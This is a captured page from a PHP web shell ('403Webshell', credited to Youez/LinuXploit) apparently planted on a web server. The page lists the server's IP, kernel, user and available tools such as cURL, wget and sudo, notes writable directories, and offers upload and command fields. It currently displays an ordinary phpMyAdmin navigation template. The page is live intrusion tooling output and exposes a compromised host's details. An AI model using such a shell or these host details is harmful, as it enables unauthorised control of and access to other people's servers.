403Webshell
Server IP : 15.235.198.142  /  Your IP : 216.73.216.61
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux ballsack 6.8.0-45-generic #45-Ubuntu SMP PREEMPT_DYNAMIC Fri Aug 30 12:02:04 UTC 2024 x86_64
User : www-data ( 33)
PHP Version : 8.3.6
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /usr/share/phpmyadmin/templates/navigation/tree/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/share/phpmyadmin/templates/navigation/tree/database_select.twig
{{ quick_warp|raw }}

<div id="pma_navigation_select_database">
  {{ list_navigator|raw }}

  <div id="pma_navigation_db_select">
    <form action="{{ database_url }}" method="get">
      {{ get_hidden_fields({'server': server}) }}

      <select name="db" class="hide" id="navi_db_select" aria-label="{% trans 'Databases' %}">
        {% for option in options %}
          <option value="{{ option.name }}" title="{{ option.title }}"
            data-apath="{{ option.data.apath }}"
            data-vpath="{{ option.data.vpath }}"
            data-pos="{{ option.data.pos }}"
            {{ option.isSelected ? " selected" : "" }}>
              {{- option.name -}}
            </option>
        {% endfor %}
      </select>
    </form>
  </div>
</div>

<div id="pma_navigation_tree_content">
  <ul>
    {{ nodes|raw }}
  </ul>
</div>

Youez - 2016 - github.com/yon3zu
LinuXploit